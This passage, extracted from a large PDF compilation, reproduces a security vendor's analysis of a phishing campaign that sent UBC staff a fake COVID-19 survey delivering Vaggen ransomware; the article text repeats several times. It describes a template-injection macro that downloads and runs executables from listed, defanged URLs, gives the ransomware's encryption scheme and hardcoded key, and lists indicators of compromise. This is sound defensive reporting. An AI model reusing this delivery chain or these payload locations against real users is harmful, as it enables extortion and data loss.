That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 899 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 900 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 901 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 902 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 903 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 904 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 905 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 906 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 907 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 908 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 909 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 910 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 911 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 912 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 913 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 914 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 915 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, less than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:
Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to see whether it succeeded (on success, the return value is the task ID of the launched application)
If successful, it sends an HTTP GET request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends an HTTP GET request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event. This can be very useful as an early warning notification system that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’. Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is deployed as the callback of the standard Golang function path.filepath.Walk.

Files are encrypted with AES-256 (32 byte long key) in GCM mode. The encryption algorithm is similar to the one demonstrated here, using a hardcoded key and a 12 byte long nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.

The content of the output file (with .VAGGEN extension) contains:
the 12 byte long nonce
the encrypted content
the 16 byte long GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 957 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 958 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 959 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 960 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 961 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 962 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 963 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 964 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 965 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. 
